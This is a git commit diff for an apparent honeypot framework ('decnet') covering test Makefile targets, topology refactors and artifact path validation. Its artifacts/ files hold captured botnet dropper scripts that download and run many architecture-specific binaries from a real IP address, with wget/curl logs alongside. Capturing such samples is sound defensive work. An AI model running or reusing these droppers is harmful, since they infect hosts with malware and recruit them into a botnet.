fix(test/schema): pin xdist_group to prevent multi-server startup, cap workers at 4

fix(deps): pin urllib3>=2.7.0 to resolve CVE-2026-44431 and CVE-2026-44432
feat(test): add test-schema target and SCHEMA_QUICK=1 mode for schemathesis
2026-05-16 18:36:26 -04:00 · 2026-05-16 18:26:47 -04:00 · 2026-05-16 18:25:40 -04:00 · 2026-05-10 22:45:05 -04:00 · 2026-05-10 22:43:33 -04:00 · 2026-05-10 22:39:24 -04:00
963 changed files with 93452 additions and 9225 deletions
--- a/.gitignore
+++ b/.gitignore
@@ -51,3 +51,22 @@ schem
 # pydeps-style dependency graph dumps from local analysis runs.
 deps.txt
 # Node modules vendored under decnet/canary/ for the obfuscator helper.
 # The package.json is the source of truth; modules are reinstalled at
 # build/deploy time.
 node_modules/
 package-lock.json
 # TTP rule-precision corpus pulled from prod sqlite. Real attacker
 # payloads — operator-only artifact. The synthetic ``seed_*.jsonl``
 # files alongside ARE committed and exercise the harness in CI.
 tests/ttp/rule_precision/corpus/*.jsonl
 tests/ttp/rule_precision/corpus/seed_*.jsonl
 threatfox-api.json
 # MITRE ATT&CK STIX bundle — 50 MB, fetched at runtime via attack_stix.py
 enterprise-attack-*.json
 # pytest failure dump files
 testfail
--- a/219
+++ b/219
@@ -0,0 +1,219 @@
 PYTEST     := .311/bin/pytest
 FAIL_FAST  ?= 1
 ARGS       :=
 # addopts in pyproject.toml already provides -v -q -x -n 4 --dist load.
 # Unit suites inherit that; special suites clear it with --override-ini.
 UNIT_FLAGS  := --timeout=30 --timeout-method=thread
 SEQ_FLAGS   := --override-ini="addopts=-v -x" -n logical --timeout=120 --timeout-method=thread
 FUZZ_FLAGS  := --override-ini="addopts=-v -x" -n logical -m fuzz \
 	--ignore=tests/api/test_schemathesis.py \
 	--ignore=tests/api/test_schemathesis_agent.py \
 	--ignore=tests/api/test_schemathesis_swarm.py \
 	--ignore=tests/api/test_schemathesis_ttp.py
 SCHEMA_QUICK ?= 0
 SCHEMA_FLAGS := --override-ini="addopts=-v -x" -n 4 -m fuzz --timeout=600 --timeout-method=thread
 BENCH_FLAGS := --override-ini="addopts=-v" -p no:xdist --benchmark-only -m bench
 # ── Unit suites (xdist, 30s timeout) ─────────────────────────────────────────
 .PHONY: test-core
 test-core:
 	$(PYTEST) tests/core tests/config tests/factories tests/fixtures $(UNIT_FLAGS) $(ARGS)
 .PHONY: test-web
 test-web:
 	$(PYTEST) tests/web tests/services $(UNIT_FLAGS) $(ARGS)
 .PHONY: test-db
 test-db:
 	$(PYTEST) tests/db tests/vectorstore $(UNIT_FLAGS) $(ARGS)
 .PHONY: test-bus
 test-bus:
 	$(PYTEST) tests/bus tests/logging tests/telemetry $(UNIT_FLAGS) $(ARGS)
 .PHONY: test-ttp
 test-ttp:
 	$(PYTEST) tests/ttp $(UNIT_FLAGS) $(ARGS)
 .PHONY: test-intel
 test-intel:
 	$(PYTEST) tests/intel tests/asn tests/geoip $(UNIT_FLAGS) $(ARGS)
 .PHONY: test-analysis
 test-analysis:
 	$(PYTEST) tests/clustering tests/correlation $(UNIT_FLAGS) $(ARGS)
 .PHONY: test-infra
 test-infra:
 	$(PYTEST) tests/agent tests/collector tests/sniffer tests/profiler $(UNIT_FLAGS) $(ARGS)
 .PHONY: test-fleet
 test-fleet:
 	$(PYTEST) tests/fleet tests/swarm tests/topology tests/orchestrator tests/deploy tests/updater $(UNIT_FLAGS) $(ARGS)
 .PHONY: test-cli
 test-cli:
 	$(PYTEST) tests/cli tests/engine tests/mutator tests/realism $(UNIT_FLAGS) $(ARGS)
 .PHONY: test-features
 test-features:
 	$(PYTEST) tests/canary tests/artifacts tests/webhook tests/decky_io tests/prober $(UNIT_FLAGS) $(ARGS)
 # ── Go and React suites ───────────────────────────────────────────────────────
 _GO_MODULES := \
 	decnet/templates/_caddy_modules/decnetfp \
 	decnet/templates/http/_caddy_modules/decnetfp \
 	decnet/templates/https/_caddy_modules/decnetfp
 .PHONY: test-go
 test-go:
 	@failed=""; \
 	for mod in $(_GO_MODULES); do \
 		echo "=== go test: $$mod ==="; \
 		if (cd "$$mod" && go test ./...); then \
 			echo "[PASS] $$mod"; \
 		else \
 			echo "[FAIL] $$mod"; \
 			failed="$$failed $$mod"; \
 			if [ "$(FAIL_FAST)" = "1" ]; then exit 1; fi; \
 		fi; \
 	done; \
 	[ -z "$$failed" ]
 .PHONY: test-react
 test-react:
 	cd decnet_web && npm run test:run $(ARGS)
 # ── Special suites (sequential, longer timeout) ───────────────────────────────
 .PHONY: test-live
 test-live:
 	$(PYTEST) tests/live -m live $(SEQ_FLAGS) $(ARGS)
 .PHONY: test-api
 test-api:
 	$(PYTEST) tests/api $(SEQ_FLAGS) $(ARGS)
 .PHONY: test-stress
 test-stress:
 	$(PYTEST) tests/stress -m stress $(SEQ_FLAGS) $(ARGS)
 .PHONY: test-service
 test-service:
 	$(PYTEST) tests/service_testing $(SEQ_FLAGS) $(ARGS)
 .PHONY: test-fuzz
 test-fuzz:
 	$(PYTEST) $(FUZZ_FLAGS) $(ARGS)
 .PHONY: test-schema
 test-schema:
 	SCHEMA_QUICK=$(SCHEMA_QUICK) $(PYTEST) \
 		tests/api/test_schemathesis.py \
 		tests/api/test_schemathesis_agent.py \
 		tests/api/test_schemathesis_swarm.py \
 		tests/api/test_schemathesis_ttp.py \
 		$(SCHEMA_FLAGS) $(ARGS)
 .PHONY: test-bench
 test-bench:
 	$(PYTEST) tests/perf $(BENCH_FLAGS) $(ARGS)
 .PHONY: test-docker
 test-docker:
 	DECNET_LIVE_DOCKER=1 $(PYTEST) tests/docker -m docker $(SEQ_FLAGS) $(ARGS)
 # ── Static analysis ───────────────────────────────────────────────────────────
 .PHONY: test-mypy
 test-mypy:
 	.311/bin/mypy decnet --ignore-missing-imports --no-error-summary
 .PHONY: test-bandit
 test-bandit:
 	.311/bin/bandit -r decnet -c pyproject.toml
 .PHONY: test-vulture
 test-vulture:
 	.311/bin/vulture decnet --min-confidence 80
 .PHONY: test-pip-audit
 test-pip-audit:
 	.311/bin/pip-audit
 # ── Composite: all suites ─────────────────────────────────────────────────────
 _ALL_SUITES := core web db bus ttp intel analysis infra fleet cli features \
               go react \
               live api schema stress service fuzz bench docker \
               mypy bandit vulture pip-audit
 .PHONY: test-all test
 test-all test:
 	@failed=""; \
 	for suite in $(_ALL_SUITES); do \
 		echo ""; \
 		echo "══════════════════════════ $$suite ══════════════════════════"; \
 		if $(MAKE) --no-print-directory test-$$suite ARGS="$(ARGS)"; then \
 			echo "[PASS] $$suite"; \
 		else \
 			echo "[FAIL] $$suite"; \
 			failed="$$failed $$suite"; \
 			if [ "$(FAIL_FAST)" = "1" ]; then \
 				echo "Stopping at first failure. Use FAIL_FAST=0 to run all suites."; \
 				exit 1; \
 			fi; \
 		fi; \
 	done; \
 	if [ -n "$$failed" ]; then \
 		echo ""; \
 		echo "Failed:$$failed"; \
 		exit 1; \
 	fi; \
 	echo ""; \
 	echo "All suites passed."
 .PHONY: help
 help:
 	@echo "Unit suites (xdist, 30s timeout):"
 	@echo "  make test-core      tests/core + config + factories + fixtures"
 	@echo "  make test-web       tests/web + services"
 	@echo "  make test-db        tests/db + vectorstore"
 	@echo "  make test-bus       tests/bus + logging + telemetry"
 	@echo "  make test-ttp       tests/ttp"
 	@echo "  make test-intel     tests/intel + asn + geoip"
 	@echo "  make test-analysis  tests/clustering + correlation"
 	@echo "  make test-infra     tests/agent + collector + sniffer + profiler"
 	@echo "  make test-fleet     tests/fleet + swarm + topology + orchestrator + deploy + updater"
 	@echo "  make test-cli       tests/cli + engine + mutator + realism"
 	@echo "  make test-features  tests/canary + artifacts + webhook + decky_io + prober"
 	@echo ""
 	@echo "Go / React suites:"
 	@echo "  make test-go        go test ./... in each Caddy module variant"
 	@echo "  make test-react     vitest run in decnet_web"
 	@echo ""
 	@echo "Special suites (sequential, 120s timeout):"
 	@echo "  make test-live      tests/live"
 	@echo "  make test-api       tests/api  (schemathesis)"
 	@echo "  make test-stress    tests/stress"
 	@echo "  make test-service   tests/service_testing"
 	@echo "  make test-schema              schemathesis contract tests (-m fuzz, xdist logical)"
 	@echo "  make test-schema SCHEMA_QUICK=1   same, capped at 100 examples per test"
 	@echo "  make test-fuzz      hypothesis fuzz (all normal dirs, -m fuzz, skips schemathesis files)"
 	@echo "  make test-bench     tests/perf"
 	@echo "  make test-docker    tests/docker  (needs DECNET_LIVE_DOCKER=1)"
 	@echo ""
 	@echo "Static analysis:"
 	@echo "  make test-mypy      mypy type check on decnet/"
 	@echo "  make test-bandit    bandit security scan on decnet/"
 	@echo "  make test-vulture   vulture dead code scan (>=80% confidence)"
 	@echo "  make test-pip-audit pip-audit dependency vulnerability scan"
 	@echo ""
 	@echo "Composites:"
 	@echo "  make test-all       ALL suites (unit + go + react + live + api + schema + fuzz + bench + stress + docker + static analysis)"
 	@echo "  make test-all FAIL_FAST=0   same, report all failures instead of stopping"
 	@echo ""
 	@echo "Passthrough: make test-web ARGS='--lf -s'"
--- a/README.md
+++ b/README.md
@@ -182,6 +182,7 @@ Archetypes are pre-packaged machine identities. One slug sets services, preferre
 | Slug | Services | OS Fingerprint | Description |
 |---|---|---|---|
 | `deaddeck` | ssh | linux | Initial machine to be exploited. Real SSH container. |
 | `windows-workstation` | smb, rdp | windows | Corporate Windows desktop |
 | `windows-server` | smb, rdp, ldap | windows | Windows domain member |
 | `domain-controller` | ldap, smb, rdp, llmnr | windows | Active Directory DC |
@@ -272,6 +273,11 @@ List live at any time with `decnet services`.
 Most services accept persona configuration to make honeypot responses more convincing. Config is passed via INI subsections (`[decky-name.service]`) or the `service_config` field in code.
 ```ini
 [deaddeck-1]
 amount=1
 archetype=deaddeck
 ssh.password=admin
 [decky-webmail.http]
 server_header = Apache/2.4.54 (Debian)
 fake_app      = wordpress
--- a/artifacts/curl.sh
+++ b/artifacts/curl.sh
@@ -0,0 +1,3 @@
 [0] Downloading 'http://31.56.209.39/curl.sh' ...
 Saving 'curl.sh.1'
 HTTP response 200 OK [http://31.56.209.39/curl.sh]
--- a/artifacts/curl.sh.1
+++ b/artifacts/curl.sh.1
@@ -0,0 +1,46 @@
 #!/bin/sh
 ulimit -n 4096
 ulimit -n 999999
 ulimit -v 2097152
 cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
 rm -rf odin*
 rm -rf bizy*
 rm -rf rs*
 rm -rf *.sh
 #curl http://31.56.209.39/rs.arm -o rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
 #curl http://31.56.209.39/rs.arm5 -o rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
 #curl http://31.56.209.39/rs.arm6 -o rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
 #curl http://31.56.209.39/rs.arm7 -o rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
 #curl http://31.56.209.39/rs.mips -o rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
 #curl http://31.56.209.39/rs.mipsle -o rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
 #curl http://31.56.209.39/rs.mipsSF -o rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
 #curl http://31.56.209.39/rs.mipsleSF -o rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
 #curl http://31.56.209.39/rs.x86 -o rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
 #curl http://31.56.209.39/rs.x64 -o rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
 curl http://31.56.209.39/odin.arm -o odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.curl
 curl http://31.56.209.39/odin.arm5 -o odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.curl
 curl http://31.56.209.39/odin.arm5n -o odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.curl
 curl http://31.56.209.39/odin.arm6 -o odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.curl
 curl http://31.56.209.39/odin.arm7 -o odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.curl
 curl http://31.56.209.39/odin.m68k -o odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.curl
 curl http://31.56.209.39/odin.mips -o odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.curl
 curl http://31.56.209.39/odin.mpsl -o odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.curl
 curl http://31.56.209.39/odin.ppc -o odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.curl
 curl http://31.56.209.39/odin.sh4 -o odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.curl
 curl http://31.56.209.39/odin.spc -o odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.curl
 curl http://31.56.209.39/odin.x64 -o odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.curl
 curl http://31.56.209.39/odin.x86 -o odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.curl
 curl http://31.56.209.39/bizy.arm5 -o bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
 curl http://31.56.209.39/bizy.arm6 -o bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
 curl http://31.56.209.39/bizy.arm7 -o bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
 curl http://31.56.209.39/bizy.arm8 -o bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
 curl http://31.56.209.39/bizy.mips -o bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
 curl http://31.56.209.39/bizy.mpsl -o bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
 curl http://31.56.209.39/bizy.mipss -o bizy.mipss; chmod +x bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss;
 curl http://31.56.209.39/bizy.mpsls -o bizy.mpsls; chmod +x bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls;
 curl http://31.56.209.39/bizy.riscv -o bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
 curl http://31.56.209.39/bizy.x86 -o bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
 curl http://31.56.209.39/bizy.x64 -o bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64
--- a/artifacts/evil.sh
+++ b/artifacts/evil.sh
@@ -0,0 +1,3 @@
 wget http://31.56.209.39/wget.sh -o wget.sh
 wget http://31.56.209.39/curl.sh -o curl.sh
--- a/artifacts/wget.sh
+++ b/artifacts/wget.sh
@@ -0,0 +1,3 @@
 [0] Downloading 'http://31.56.209.39/wget.sh' ...
 Saving 'wget.sh.1'
 HTTP response 200 OK [http://31.56.209.39/wget.sh]
--- a/artifacts/wget.sh.1
+++ b/artifacts/wget.sh.1
@@ -0,0 +1,46 @@
 #!/bin/sh
 ulimit -n 4096
 ulimit -n 999999
 ulimit -v 2097152
 cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
 rm -rf odin*
 rm -rf bizy*
 rm -rf rs*
 rm -rf *.sh
 wget http://31.56.209.39/rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
 wget http://31.56.209.39/rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
 wget http://31.56.209.39/rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
 wget http://31.56.209.39/rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
 wget http://31.56.209.39/rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
 wget http://31.56.209.39/rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
 wget http://31.56.209.39/rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
 wget http://31.56.209.39/rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
 wget http://31.56.209.39/rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
 wget http://31.56.209.39/rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
 wget http://31.56.209.39/odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.wget
 wget http://31.56.209.39/odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.wget
 wget http://31.56.209.39/odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.wget
 wget http://31.56.209.39/odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.wget
 wget http://31.56.209.39/odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.wget
 wget http://31.56.209.39/odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.wget
 wget http://31.56.209.39/odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.wget
 wget http://31.56.209.39/odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.wget
 wget http://31.56.209.39/odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.wget
 wget http://31.56.209.39/odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.wget
 wget http://31.56.209.39/odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.wget
 wget http://31.56.209.39/odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.wget
 wget http://31.56.209.39/odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.wget
 wget http://31.56.209.39/bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
 wget http://31.56.209.39/bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
 wget http://31.56.209.39/bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
 wget http://31.56.209.39/bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
 wget http://31.56.209.39/bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
 wget http://31.56.209.39/bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
 wget http://31.56.209.39/bizy.mipss; chmod +x ./bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss
 wget http://31.56.209.39/bizy.mpsls; chmod +x ./bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls
 wget http://31.56.209.39/bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
 wget http://31.56.209.39/bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
 wget http://31.56.209.39/bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64
--- a/bait/.gitkeep
+++ b/bait/.gitkeep
--- a/bait/README.md
+++ b/bait/README.md
@@ -0,0 +1,5 @@
 # bait/
 Default operator-supplied email seed for IMAP/POP3 deckies. Drop `*.eml` and/or `*.json` files here; the IMAP/POP3 services bind-mount this dir read-only at `/var/spool/decnet-emails/seed` when no per-decky `email_seed` is configured. Entries concatenate onto the hardcoded bait baseline (additive to realism-engine output, never replacing).
 JSON shape: list of dicts with required `from_addr`, `to_addr`, `subject`, `body`; optional `from_name`, `date`, `flags`. See `decnet/templates/imap/server.py` for the loader.
--- a/decnet.tar
+++ b/decnet.tar
--- a/decnet/agent/executor.py
+++ b/decnet/agent/executor.py
@@ -194,7 +194,7 @@ async def self_destruct() -> None:
        argv = ["/bin/bash", path]
        spawn_kwargs = {"start_new_session": True}
-    subprocess.Popen(  # nosec B603
+    subprocess.Popen(  # type: ignore[call-overload]  # nosec B603
        argv,
        stdin=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
--- a/decnet/agent/heartbeat.py
+++ b/decnet/agent/heartbeat.py
@@ -121,7 +121,7 @@ def start() -> Optional[asyncio.Task]:
        return None
    try:
-        from decnet import __version__ as _v
+        from decnet import __version__ as _v  # type: ignore[attr-defined]
        agent_version = _v
    except Exception:
        agent_version = "unknown"
--- a/decnet/agent/topology_ops.py
+++ b/decnet/agent/topology_ops.py
@@ -59,6 +59,73 @@ def _topology_id(hydrated: dict[str, Any]) -> str:
    return str(tid)
 def _check_hash_and_validate(hydrated: dict[str, Any], version_hash: str) -> str:
    """Verify hash integrity and structural validity; return topology_id."""
    local_hash = canonical_hash(hydrated)
    if local_hash != version_hash:
        raise HashMismatch(
            f"master hash {version_hash!r} does not match agent hash "
            f"{local_hash!r} — refusing to apply"
        )
    issues = _validate_topology(hydrated)
    if _validation_errors(issues):
        raise ValidationError(issues)
    return _topology_id(hydrated)
 async def _teardown_superseded(topology_id: str, store: TopologyStore) -> None:
    """Tear down the current topology if it differs from topology_id.
    Master is authoritative — a different pinned topology (fully applied,
    partially applied, or drifted) is torn down before the new apply proceeds.
    Refusing with 409 would leave the agent stuck in a state only a human
    could resolve.
    """
    existing = store.current()
    if existing is None or existing.topology_id == topology_id:
        return
    log.info(
        "superseding topology %s with %s on master authority",
        existing.topology_id, topology_id,
    )
    try:
        await teardown(existing.topology_id, store)
    except Exception as exc:  # noqa: BLE001 — we still want to try applying
        log.warning(
            "best-effort teardown of superseded topology %s failed: %s",
            existing.topology_id, exc,
        )
        # Hard-clear the store row so the new apply isn't blocked by a
        # half-torn-down predecessor.  Leftover docker objects surface via
        # the next heartbeat's observed block.
        store.clear(existing.topology_id)
 def _materialise(hydrated: dict[str, Any], topology_id: str) -> None:
    """Create bridge networks, write compose file, and bring up containers.
    Sync/blocking — callers must dispatch via asyncio.to_thread.
    ``--always-recreate-deps`` keeps service containers' netns shares
    fresh: every decky service joins its base's netns via
    ``network_mode: container:<base>``, and that share is bound at
    service start time. If a base is recreated (e.g. when ``ports:``
    changes after toggling ``forwards_l3``) but compose decides the
    services are unchanged, the services keep a stale netns FD
    pointing at the destroyed base — they end up in an empty
    namespace with only ``lo``, and external traffic hits a closed
    port on the live base. Forcing dependents to recreate alongside
    the base is the cheapest way to make this race impossible.
    """
    compose_path = _topology_compose_path(topology_id)
    client = docker.from_env()
    for lan in hydrated["lans"]:
        net_name = _topology_network_name(topology_id, lan["name"])
        create_bridge_network(client, net_name, lan["subnet"], internal=not lan["is_dmz"])
    write_topology_compose(hydrated, compose_path)
    _compose_with_retry("up", "--build", "-d", "--always-recreate-deps", compose_file=compose_path)
 async def apply(
    hydrated: dict[str, Any],
    version_hash: str,
@@ -73,76 +140,11 @@ async def apply(
      Any docker / compose error propagates up; the endpoint maps it
        to 500 and records the message on the store row.
    """
-    local_hash = canonical_hash(hydrated)
+    topology_id = _check_hash_and_validate(hydrated, version_hash)
-    if local_hash != version_hash:
+    await _teardown_superseded(topology_id, store)
-        raise HashMismatch(
+    await asyncio.to_thread(_materialise, hydrated, topology_id)
            f"master hash {version_hash!r} does not match agent hash "
            f"{local_hash!r} — refusing to apply"
        )
    issues = _validate_topology(hydrated)
    if _validation_errors(issues):
        raise ValidationError(issues)
    topology_id = _topology_id(hydrated)
    # Master is authoritative.  If a different topology is pinned here
    # — whether it fully applied, only partially applied (failure
    # marker row + orphan containers), or drifted — teardown first,
    # then accept the new one.  Refusing with 409 would leave the
    # agent stuck in a state only a human could resolve.
    existing = store.current()
    if existing is not None and existing.topology_id != topology_id:
        log.info(
            "superseding topology %s with %s on master authority",
            existing.topology_id, topology_id,
        )
        try:
            await teardown(existing.topology_id, store)
        except Exception as exc:  # noqa: BLE001 — we still want to try applying
            log.warning(
                "best-effort teardown of superseded topology %s failed: %s",
                existing.topology_id, exc,
            )
            # Hard-clear the store row so the new apply isn't blocked
            # by a half-torn-down predecessor.  Leftover docker objects
            # will surface via the next heartbeat's observed block.
            store.clear(existing.topology_id)
    lans = hydrated["lans"]
    compose_path = _topology_compose_path(topology_id)
    client = docker.from_env()
    # Bridges + compose are sync/blocking; hop to a thread so we don't
    # stall the event loop on a slow docker daemon.
    def _materialise() -> None:
        for lan in lans:
            net_name = _topology_network_name(topology_id, lan["name"])
            internal = not lan["is_dmz"]
            create_bridge_network(
                client, net_name, lan["subnet"], internal=internal
            )
        write_topology_compose(hydrated, compose_path)
        # ``--always-recreate-deps`` keeps service containers' netns shares
        # fresh: every decky service joins its base's netns via
        # ``network_mode: container:<base>``, and that share is bound at
        # service start time. If a base is recreated (e.g. when ``ports:``
        # changes after toggling ``forwards_l3``) but compose decides the
        # services are unchanged, the services keep a stale netns FD
        # pointing at the destroyed base — they end up in an empty
        # namespace with only ``lo``, and external traffic hits a closed
        # port on the live base. Forcing dependents to recreate alongside
        # the base is the cheapest way to make this race impossible.
        _compose_with_retry(
            "up", "--build", "-d", "--always-recreate-deps",
            compose_file=compose_path,
        )
    await asyncio.to_thread(_materialise)
    store.put(topology_id, version_hash, hydrated)
-    log.info(
+    log.info("topology %s applied on agent (%d LANs)", topology_id, len(hydrated["lans"]))
        "topology %s applied on agent (%d LANs)", topology_id, len(lans)
    )
 async def teardown(
--- a/decnet/agent/topology_store.py
+++ b/decnet/agent/topology_store.py
@@ -63,6 +63,7 @@ class TopologyStore:
        # The agent is single-process, so there's no real contention —
        # sqlite's own connection lock is enough.
        self._conn = sqlite3.connect(str(db_path), check_same_thread=False)
        self._conn.row_factory = sqlite3.Row
        self._conn.execute(
            "CREATE TABLE IF NOT EXISTS applied_topology ("
            " topology_id TEXT PRIMARY KEY,"
@@ -84,11 +85,11 @@ class TopologyStore:
        if row is None:
            return None
        return AppliedRow(
-            topology_id=row[0],
+            topology_id=row["topology_id"],
-            applied_version_hash=row[1],
+            applied_version_hash=row["applied_version_hash"],
-            hydrated=json.loads(row[2]),
+            hydrated=json.loads(row["hydrated_blob_json"]),
-            applied_at=int(row[3]),
+            applied_at=int(row["applied_at"]),
-            last_error=row[4],
+            last_error=row["last_error"],
        )
    # ---------------------------------------------------------------- writes
--- a/decnet/artifacts/init.py
+++ b/decnet/artifacts/init.py
@@ -0,0 +1 @@
 """Artifact storage helpers shared between the web router and TTP workers."""
--- a/decnet/artifacts/paths.py
+++ b/decnet/artifacts/paths.py
@@ -0,0 +1,86 @@
 """
 Shared on-disk artifact path resolution.
 Honeypot decoys (SSH, SMTP) farm captured payloads into a host-mounted
 quarantine tree:
    /var/lib/decnet/artifacts/{decky}/{service}/{stored_as}
 Two callers need to translate ``(decky, stored_as, service)`` into a
 concrete ``Path`` rooted under that tree:
 * The web router endpoint ``GET /api/v1/artifacts/{decky}/{stored_as}``
  (``decnet.web.router.artifacts.api_get_artifact``) — admin-gated
  download for the dashboard.
 * The TTP ``EmailLifter`` (``decnet.ttp.impl.email_lifter``), which
  reads the stored ``.eml`` at tag-time so body-aware predicates
  (R0047 BEC, R0048 macro) don't need raw body text on the bus.
 Both callers share the same validation rules and the same
 defence-in-depth symlink-escape check; this module is the single
 implementation. It is auth-agnostic — wrappers layer authentication
 where appropriate (the router does ``require_admin``, the lifter does
 not).
 """
 from __future__ import annotations
 import os
 import re
 from pathlib import Path
 # decky names come from the deployer — lowercase alnum plus hyphens.
 _DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
 # Services that own an artifacts subdir. Kept explicit so a caller
 # can't pivot into arbitrary subpaths via a query string or bus payload.
 _ALLOWED_SERVICES = frozenset({"ssh", "smtp"})
 # stored_as is assembled by the capturing template as:
 #   ${ts}_${sha:0:12}_${base}
 # where ts is ISO-8601 UTC (e.g. 2026-04-18T02:22:56Z), sha is 12 hex chars,
 # and base is the original filename's basename. Keep the filename charset
 # tight but allow common punctuation dropped files actually use.
 _STORED_AS_RE = re.compile(
    r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z_[a-f0-9]{12}_[A-Za-z0-9._-]{1,255}$"
 )
 # Module-level so tests can monkeypatch. Override via env in production
 # (the systemd unit sets this) — the prod path matches the bind mount
 # declared in decnet/services/{ssh,smtp}.py.
 ARTIFACTS_ROOT = Path(
    os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
 )
 class ArtifactPathError(ValueError):
    """Raised when (decky, stored_as, service) fails validation or escapes
    the artifacts root.
    The router catches this and re-raises HTTPException(400). The lifter
    catches it and treats the event as having no body available (no-tag).
    """
 def resolve_artifact_path(decky: str, stored_as: str, service: str) -> Path:
    """Validate inputs, resolve the on-disk path, and confirm it stays
    inside the artifacts root.
    Raises :class:`ArtifactPathError` on any violation. Does NOT check
    that the file exists — callers handle that distinctly (404 for the
    router, no-tag for the lifter).
    """
    if service not in _ALLOWED_SERVICES:
        raise ArtifactPathError("invalid service")
    if not _DECKY_RE.fullmatch(decky):
        raise ArtifactPathError("invalid decky name")
    if not _STORED_AS_RE.fullmatch(stored_as):
        raise ArtifactPathError("invalid stored_as")
    root = ARTIFACTS_ROOT.resolve()
    candidate = (root / decky / service / stored_as).resolve()
    # defence-in-depth: even though the regexes reject `..`, make sure a
    # symlink or weird filesystem state can't escape the root.
    if root not in candidate.parents and candidate != root:
        raise ArtifactPathError("path escapes artifacts root")
    return candidate
--- a/decnet/artifacts/shards.py
+++ b/decnet/artifacts/shards.py
@@ -0,0 +1,129 @@
 """Shared asciinema shard helpers.
 Extracted from ``decnet/web/router/transcripts/api_get_transcript.py``
 so non-router callers (the BEHAVE-SHELL session-ended handler in
 ``decnet/profiler/worker.py``, the collector's session aggregator)
 can resolve shard paths without crossing the layer boundary into the
 FastAPI router.
